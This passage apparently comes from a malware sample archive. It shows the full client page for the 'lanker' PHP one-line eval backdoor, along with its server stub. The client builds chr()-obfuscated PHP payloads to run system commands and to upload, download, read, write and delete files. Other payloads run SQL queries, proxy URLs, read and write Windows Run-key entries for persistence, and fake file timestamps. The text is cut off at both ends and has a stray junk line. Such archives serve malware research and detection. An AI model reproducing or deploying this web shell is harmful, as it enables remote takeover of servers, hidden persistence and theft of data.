frm.tmpcmd.value="$dirs="
frm.tmpcmd.value+=duqu(frm.dir.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@rmdir($dirs)) echo chr(79).chr(75).chr(33);"
}
function returnc(){
alret("document.frm.ifff.value")
}
</script>
<script >
function duqu(zifu){
var duqu="";
for(i=1;i<zifu.length;i++){
duqu+="chr("+zifu.charCodeAt(i-1)+").";
}
duqu+="chr("+zifu.charCodeAt(zifu.length-1)+")";
return duqu
}
</script>

474
PHP/Backdoor.PHP.Lanker.b Normal file
View File

@ -0,0 +1,474 @@
<HTML><HEAD>
<!-- codz by LANKER(QQ:18779569) 2005/1/1-->
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<style>
<!--
td {font-size:8pt; color: #666666;font-family:Verdana}
INPUT {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
textarea {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
select {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
BODY {font-size:9pt; color: #666666;font-family:Verdana; SCROLLBAR-FACE-COLOR: #ffffff; background color:#eeeeee;cursor:SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #aaaaaa; SCROLLBAR-3DLIGHT-COLOR: #aaaaaa; SCROLLBAR-ARROW-COLOR: #dddddd; SCROLLBAR-TRACK-COLOR: #ffffff; SCROLLBAR-DARKSHADOW-COLOR: #ffffff }
a:link {text-decoration:none; color:#336699}
a:visited {text-decoration:none; color:#336699}
a:active {text-decoration:none; color:#336699}
a:hover {COLOR: #b4c8d8; }
.tb {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#cccccc}
.tb0 {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#fcfcfc}
.tb1 {background-color:#ffffff} </style>
-->
</STYLE>
</HEAD>
<BODY style="FONT-SIZE: 9pt" bgcolor="#cccccc">
<CENTER style="cursor:hand;">
<font color="#000080">
lanker一句话PHP后门客户端3.0</font><FONT color=#ff3300>内部版</font>
</CENTER>
<hr size="1" color="#000080">
<FORM ENCTYPE="multipart/form-data" name=frm method=post target=qq2>
<TABLE style="FONT-SIZE: 9pt">
<TD width=750 height=10>后门地址: <INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=60 value=http://127.0.0.1/door.php name=act> 密码: <INPUT 后门
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=10 value=cmd name=para>生成器:<textarea rows='1' name='tmpcmd' cols='23'>&lt;?php eval($_POST[cmd]?;&gt;</textarea></TD></TABLE>
<TABLE width=750 >
<TD bgcolor=#ffffff><TABLE style="FONT-SIZE: 9pt" ><tr width=200 height=10>
<select onchange="showDiv(this.value);">
<option value="digest" >----基本功能列表----</option>
<option value="2" >PHP环境变量</option>
<option value="16" >服务器基本信息</option>
<option value="1" >本程序目录</option>
<option value="3" >执行CMD命令</option>
<option value="17" >无回显CMD命令</option>
<option value="6" >读取目录</option>
<option value="14" >创建目录</option>
<option value="15" >删除目录</option>
<option value="4" >上传文件</option>
<option value="5" >读取文件</option>
<option value="12" >创建文件</option>
<option value="7" >复制文件</option>
<option value="8" >重命名文件</option>
<option value="9" >删除文件</option>
<option value="13" >下载文件</option>
<option value="21" >克隆文件时间</option>
<option value="22" >在线代理</option>
<option value="11" >执行SQL语句</option>
<option value="18" >读取注册表</option>
<option value="19" >写入注册表</option>
<option value="20" >删除注册表</option>
<option value="10" >专家模式(自己写代码)</option>
</select></tr><tr height=260><TD id="yunxing" ><FONT color=#ff3300>LANKER微型PHP后门服务端代码<br>&lt;?php eval($_POST[cmd])?><hr size="1" color="#000080"><br>容错代码为:<br>&lt;?php @eval($_POST[cmd])?></font><TD></tr></TABLE></td><td><TABLE style="FONT-SIZE: 9pt"><IFRAME border=1 height=340 width=580 name=qq2 marginwidth=0 marginheight=0 vspace=0
src="about:blank"
frameborder=no scrolling=auto></IFRAME></TABLE></td></table>
</form>
<hr size="1" color="#000000">
<CENTER>
<center>
<FONT color=#ff3300>声明:此版为内部版未经授权允许严禁传给他人和提供公开下载谢谢合作By lanker</font></center>
</BODY></HTML>
<script language="javascript">
function showDiv(aa){
switch(aa)
{
case "2":
yunxing.innerHTML="<p align='center'>本程序目录<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"echo dirname(__FILE__);\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "1":
yunxing.innerHTML="PHP环境变量<br>"
yunxing.innerHTML+="<p align='center'><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"phpinfo();\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "3":
yunxing.innerHTML="<p align='center'>执行函数:<br><select name='execfun'><option value='system' selected>system</option><option value='syscom'>调用COM对象(适用WINNT)</option><option value='passthru'>passthru</option><option value='`'>反引号(`)</option><option value='shell_exec'>shell_exec</option><option value='exec'>exec</option><option value='popen'>popen</option></select><br><br>命令:<br><INPUT size=24 name=\"cmdname\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;cmd();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "4":
yunxing.innerHTML="文件路径(不填为当前目录)<br><input type=text name='uploaddir' value='c:/lanker' size=24><p align='center'><input NAME='LanKerF' TYPE='file' size=13><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;upfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "5":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "6":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "7":
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=24 name=\"file1\"><br>文件2:<br><INPUT size=24 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;copyfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "8":
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=24 name=\"file1\"><br>文件2:<br><INPUT size=24 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;renamefile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "9":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;delfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "10":
yunxing.innerHTML="<p align='center'><textarea rows='12' name='duqu' cols='22'>phpinfo();</textarea>"
yunxing.innerHTML+="<INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=frm.duqu.value;frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br>字符转换工具:<hr size='1' color='#000000'>要转换的字符:<br><INPUT type=text name=\"inputstr\" size='23' ><br>转换后的字符:<br><textarea cols='22' rows=\"4\" name=\"chrstr\" ></textarea><br><INPUT type=button name=strtxtdd onclick=\"ascchar()\" value=\"转 换\" >"
break;
case "11":
yunxing.innerHTML="主机:<input NAME=\"servername\" TYPE=\"text\" value=\"localhost\" size=\"12\" ><BR>数据库:<input NAME=\"dbname\" TYPE=\"text\" value size=\"10\" > &nbsp;<BR>用户名:<input NAME=\"dbusername\" TYPE=\"text\" value=\"root\" size=\"10\" >&nbsp; <BR>密码:<input NAME=\"dbpassword\" TYPE=\"text\" value size=\"12\" > &nbsp; <BR>SQL语句:<BR><textarea rows=\"8\" name=\"sql\" cols=\"20\" ></textarea>"
yunxing.innerHTML+="<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;SQL();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send>"
break;
case "12":
yunxing.innerHTML="<p align='center'>文件名:<INPUT size=14 name=\"filen\"><br>文件内容:<BR><textarea rows=\"16\" name=\"filec\" cols=\"20\" ></textarea><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "13":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;downfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "14":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "15":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;rmdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "16":
yunxing.innerHTML="<p align='center'>服务器基本信息<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;info();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "17":
yunxing.innerHTML="<p align='center'>文件:<br><INPUT size=24 name=\"cmdpath\" value=\"c:/winnt/system32/cmd.exe\"><br>参数:<br><INPUT size=24 name=\"runfile\" value=\"/c net user > c:/log.txt\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;runcmd();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "18":
yunxing.innerHTML="<p align='center'>键值:<br><INPUT size=24 name=\"regpath\" value=\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readreg();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "19":
yunxing.innerHTML="<p align='center'>键值:<br><INPUT size=24 name=\"regpath\" value=\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Backdoor\"><br>类型:<select name='regtype'><option value='REG_SZ' selected>REG_SZ</option><option value='REG_BINARY' >REG_BINARY</option><option value='REG_DWORD' >REG_DWORD</option><option value='REG_MULTI_SZ' >REG_MULTI_SZ</option><option value='REG_EXPAND_SZ' >REG_EXPAND_SZ</option></select><br>值:<INPUT size=24 name=\"regval\" value=\"c:\\winnt\\backdoor.exe\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;writereg();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "20":
yunxing.innerHTML="<p align='center'>键值:<br><INPUT size=24 name=\"regpath\" value=\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;delreg();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "21":
yunxing.innerHTML="<p align='center'>参照文件:<br><INPUT size=24 name=\"file1\" value=\"c:\\boot.ini\"><br>克隆文件:<br><INPUT size=24 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;domodtime();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "22":
yunxing.innerHTML="<p align='center'>URL:<INPUT size=24 name=\"url\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;urlproxy();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
}
}
function urlproxy(){
frm.tmpcmd.value="$url="
frm.tmpcmd.value+=duqu(frm.url.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if (isset($url)) {$proxycontents = @file_get_contents($url);\n"
frm.tmpcmd.value+=" echo ($proxycontents) ? $proxycontents:获取URL内容失败;}\n"
}
function domodtime(){
frm.tmpcmd.value="$file1="
frm.tmpcmd.value+=duqu(frm.file1.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$file2="
frm.tmpcmd.value+=duqu(frm.file2.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$time=@filemtime($file1);\n"
frm.tmpcmd.value+="echo (@touch($file2,$time,$time)) ? basename($file2).的修改时间成功改为.date(chr(89).chr(45).chr(109).chr(45).chr(100).chr(32).chr(72).chr(58).chr(105).chr(58).chr(115),$time).chr(33) : 文件的修改时间修改失败;\n"
}
function writereg(){
frm.tmpcmd.value="$regpath="
frm.tmpcmd.value+=duqu(frm.regpath.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$regtype="
frm.tmpcmd.value+=duqu(frm.regtype.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$regval="
frm.tmpcmd.value+=duqu(frm.regval.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$s= &new COM(chr(87).chr(83).chr(99).chr(114).chr(105).chr(112).chr(116).chr(46).chr(83).chr(104).chr(101).chr(108).chr(108));\n"
frm.tmpcmd.value+="$a=@$s->RegWrite($regpath,$regval,$regtype);\n"
frm.tmpcmd.value+="echo ($a==0) ? chr(79).chr(75).chr(33) : chr(70).chr(65).chr(73).chr(76).chr(33);"
}
function delreg(){
frm.tmpcmd.value="$regpath="
frm.tmpcmd.value+=duqu(frm.regpath.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$s= &new COM(chr(87).chr(83).chr(99).chr(114).chr(105).chr(112).chr(116).chr(46).chr(83).chr(104).chr(101).chr(108).chr(108));"
frm.tmpcmd.value+="$a=@$s->RegDelete($regpath);\n"
frm.tmpcmd.value+="echo ($a==0) ? chr(79).chr(75).chr(33) : chr(70).chr(65).chr(73).chr(76).chr(33);"
}
function readreg(){
frm.tmpcmd.value="$regpath="
frm.tmpcmd.value+=duqu(frm.regpath.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$shell= &new COM(chr(87).chr(83).chr(99).chr(114).chr(105).chr(112).chr(116).chr(46).chr(83).chr(104).chr(101).chr(108).chr(108));"
frm.tmpcmd.value+="var_dump(@$shell->RegRead($regpath));\n"
}
function runcmd(){
frm.tmpcmd.value="$a="
frm.tmpcmd.value+=duqu(frm.cmdpath.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$b="
frm.tmpcmd.value+=duqu(frm.runfile.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$s= &new COM(chr(83).chr(104).chr(101).chr(108).chr(108).chr(46).chr(65).chr(112).chr(112).chr(108).chr(105).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110));\n"
frm.tmpcmd.value+="$c = $s->ShellExecute($a,$b);\n"
frm.tmpcmd.value+="if(!$c) echo chr(79).chr(75).chr(33);\n"
}
function cmd(){
if (frm.execfun.value =='syscom'){
frm.tmpcmd.value="$cmd="
frm.tmpcmd.value+=duqu(frm.cmdname.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="echo chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(99).chr(111).chr(108).chr(115).chr(61).chr(56).chr(48).chr(32).chr(114).chr(111).chr(119).chr(115).chr(61).chr(50).chr(54).chr(62);\n"
frm.tmpcmd.value+="$wsh = new COM(chr(87).chr(83).chr(99).chr(114).chr(105).chr(112).chr(116).chr(46).chr(83).chr(104).chr(101).chr(108).chr(108)) or die(chr(102).chr(97).chr(105).chr(108).chr(101).chr(100).chr(33));\n"
frm.tmpcmd.value+="$exec = $wsh->exec(chr(99).chr(109).chr(100).chr(46).chr(101).chr(120).chr(101).chr(32).chr(47).chr(99).chr(32).$cmd);\n"
frm.tmpcmd.value+="$stdout = $exec->StdOut ();\n"
frm.tmpcmd.value+="$stroutput = $stdout->ReadAll ();\n"
frm.tmpcmd.value+="echo ($stroutput);\n"
frm.tmpcmd.value+="echo chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62);\n"
}
else{
if (frm.execfun.value =='`'){
frm.tmpcmd.value="$cmd="
frm.tmpcmd.value+=duqu(frm.cmdname.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="echo chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(99).chr(111).chr(108).chr(115).chr(61).chr(56).chr(48).chr(32).chr(114).chr(111).chr(119).chr(115).chr(61).chr(50).chr(54).chr(62);\n"
frm.tmpcmd.value+="echo"
frm.tmpcmd.value+=frm.execfun.value
frm.tmpcmd.value+="$cmd"
frm.tmpcmd.value+=frm.execfun.value
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="echo chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62);\n"
}
else{
frm.tmpcmd.value="$cmd="
frm.tmpcmd.value+=duqu(frm.cmdname.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="echo chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(99).chr(111).chr(108).chr(115).chr(61).chr(56).chr(48).chr(32).chr(114).chr(111).chr(119).chr(115).chr(61).chr(50).chr(54).chr(62);\n"
frm.tmpcmd.value+="echo "
frm.tmpcmd.value+=frm.execfun.value
frm.tmpcmd.value+="($cmd);\n"
frm.tmpcmd.value+="echo chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62);\n"
}
}
}
function copyfile(){
frm.tmpcmd.value="$file1="
frm.tmpcmd.value+=duqu(frm.file1.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$file2="
frm.tmpcmd.value+=duqu(frm.file2.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if (@copy($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
}
function renamefile(){
frm.tmpcmd.value="$file1="
frm.tmpcmd.value+=duqu(frm.file1.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$file2="
frm.tmpcmd.value+=duqu(frm.file2.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if (@rename($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
}
function downfile(){
frm.tmpcmd.value="$df="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$f=chr(46);"
frm.tmpcmd.value+="$h=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(116).chr(121).chr(112).chr(101).chr(58).chr(32).chr(97).chr(112).chr(112).chr(108).chr(105).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(47).chr(120).chr(45);\n"
frm.tmpcmd.value+="$h1=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(68).chr(105).chr(115).chr(112).chr(111).chr(115).chr(105).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(97).chr(116).chr(116).chr(97).chr(99).chr(104).chr(109).chr(101).chr(110).chr(116).chr(59).chr(32).chr(102).chr(105).chr(108).chr(101).chr(110).chr(97).chr(109).chr(101).chr(61);\n"
frm.tmpcmd.value+="$h2=(68).chr(101).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(80).chr(72).chr(80).chr(51).chr(32).chr(71).chr(101).chr(110).chr(101).chr(114).chr(97).chr(116).chr(101).chr(100).chr(32).chr(68).chr(97).chr(116).chr(97);\n"
frm.tmpcmd.value+="$h3=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(76).chr(101).chr(110).chr(103).chr(116).chr(104).chr(58);\n"
frm.tmpcmd.value+="$fn = @basename($df);\n"
frm.tmpcmd.value+="$fe = $finfo[count($finfo)-1];\n"
frm.tmpcmd.value+="$finfo = explode($f, $fn);\n"
frm.tmpcmd.value+="header($h.$fe);\n"
frm.tmpcmd.value+="header($h1.$fn);\n"
frm.tmpcmd.value+="header($h2);\n"
frm.tmpcmd.value+="header($h3.filesize($df));\n"
frm.tmpcmd.value+="@readfile($df);\n"
frm.tmpcmd.value+="exit;\n"
}
function readfile(){
frm.tmpcmd.value="$filename="
frm.tmpcmd.value+=duqu(frm.duqu.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$s=chr(60).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="$e=chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="$fp=@fopen($filename,r);\n"
frm.tmpcmd.value+="$contents=@fread($fp, filesize($filename));\n"
frm.tmpcmd.value+="@fclose($fp);\n"
frm.tmpcmd.value+="$contents=htmlspecialchars($contents);\n"
frm.tmpcmd.value+="echo $s.$contents.$e;\n"
}
function readdir(){
frm.tmpcmd.value="$dir="
frm.tmpcmd.value+=duqu(frm.duqu.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$f = chr(60).chr(98).chr(114).chr(62);"
frm.tmpcmd.value+="$dir=@dir($dir);"
frm.tmpcmd.value+="if($dir) "
frm.tmpcmd.value+="{"
frm.tmpcmd.value+=" echo path_______.$dir->path.$f;"
frm.tmpcmd.value+=" while($entry=$dir->read())"
frm.tmpcmd.value+=" {"
frm.tmpcmd.value+=" echo ____.$entry.$f; "
frm.tmpcmd.value+=" }"
frm.tmpcmd.value+=" $dir->close();"
frm.tmpcmd.value+="}"
frm.tmpcmd.value+="else"
frm.tmpcmd.value+="{echo 0;}"
}
function SQL(){
frm.tmpcmd.value="$message=chr(102).chr(97).chr(105).chr(108).chr(33);\n"
frm.tmpcmd.value+="$fgf=chr(32);\n"
if(frm.dbpassword.value !=''){
frm.tmpcmd.value+="$dbpassword= "
frm.tmpcmd.value+=duqu(frm.dbpassword.value)
frm.tmpcmd.value+=";\n"
}
frm.tmpcmd.value+="$servername="
frm.tmpcmd.value+=duqu(frm.servername.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbusername="
frm.tmpcmd.value+=duqu(frm.dbusername.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbname="
frm.tmpcmd.value+=duqu(frm.dbname.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$sql="
frm.tmpcmd.value+=duqu(frm.sql.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="@mysql_connect($servername,$dbusername,$dbpassword) or die($message);\n"
frm.tmpcmd.value+="@mysql_select_db($dbname) or die($message);\n"
frm.tmpcmd.value+="$sql=stripslashes($sql);\n"
frm.tmpcmd.value+="$result = @mysql_query($sql);\n"
frm.tmpcmd.value+="while($row=mysql_fetch_array($result,MYSQL_BOTH)){\n"
frm.tmpcmd.value+="for($j=0;$j<count($row);$j++){\n"
frm.tmpcmd.value+="print($row[$j].$fgf);}\n"
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);}\n"
frm.tmpcmd.value+="mysql_free_result($result);\n"
frm.tmpcmd.value+="mysql_close();\n"
}
function createfile(){
frm.tmpcmd.value="$filen="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$filec="
frm.tmpcmd.value+=duqu(frm.filec.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$a=chr(119);\n"
frm.tmpcmd.value+="$fp=@fopen($filen,$a);\n"
frm.tmpcmd.value+="$msg=@fwrite($fp,$filec);\n"
frm.tmpcmd.value+="if($msg) echo chr(79).chr(75).chr(33);\n"
frm.tmpcmd.value+="@fclose($fp);\n"
}
11111111111111111
function delfile(){
frm.tmpcmd.value="$filen="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@unlink($filen)) echo chr(79).chr(75).chr(33);"
}
function createdir(){
frm.tmpcmd.value="$dirs="
frm.tmpcmd.value+=duqu(frm.dir.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@mkdir($dirs,0777)) echo chr(79).chr(75).chr(33);"
}
function rmdir(){
frm.tmpcmd.value="$dirs="
frm.tmpcmd.value+=duqu(frm.dir.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@rmdir($dirs)) echo chr(79).chr(75).chr(33);"
}
function upfile(){
frm.tmpcmd.value="$uploaddir="
frm.tmpcmd.value+=duqu(frm.uploaddir.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value="if (strlen($uploaddir)<1){\n"
frm.tmpcmd.value+="$updir=$_FILES[LanKerF][name];}\n"
frm.tmpcmd.value+="else{\n"
frm.tmpcmd.value+="$updir=$uploaddir.chr(47).$_FILES[LanKerF][name];}\n"
frm.tmpcmd.value+="if(@copy($_FILES[LanKerF][tmp_name],$updir)) echo upfile.chr(58).$updir.chr(32).chr(32).OK.chr(33);"
}
function ascchar(){
frm.chrstr.value=duqu(frm.inputstr.value)
}
function info(){
frm.tmpcmd.value="echo 服务器系统.chr(58);"
frm.tmpcmd.value+="echo PHP_OS;"
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);"
frm.tmpcmd.value+="echo 服务器操作系统文字编码.chr(58);"
frm.tmpcmd.value+="echo $_SERVER[HTTP_ACCEPT_LANGUAGE];"
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);"
frm.tmpcmd.value+="echo 服务器IP.chr(58);"
frm.tmpcmd.value+="echo $_SERVER[SERVER_NAME];"
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);"
frm.tmpcmd.value+="echo Web服务端口端口.chr(58);"
frm.tmpcmd.value+="echo $_SERVER[SERVER_PORT];"
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);"
frm.tmpcmd.value+="echo PHP运行方式.chr(58);"
frm.tmpcmd.value+="echo strtoupper(php_sapi_name());"
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);"
frm.tmpcmd.value+="echo PHP版本.chr(58);"
frm.tmpcmd.value+="echo PHP_VERSION;"
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);"
frm.tmpcmd.value+="echo 本文件路径.chr(58);"
frm.tmpcmd.value+="echo $_SERVER[PATH_TRANSLATED];"
}
</script>
<script >
function duqu(strcode){
var duqu="";
for(i=1;i<strcode.length;i++){
if(strcode.charCodeAt(i-1)<256){
duqu+="chr("+strcode.charCodeAt(i-1)+").";
}
else
duqu+=strcode.charAt(i-1)+".";
}
if(strcode.charCodeAt(i-1)<256){
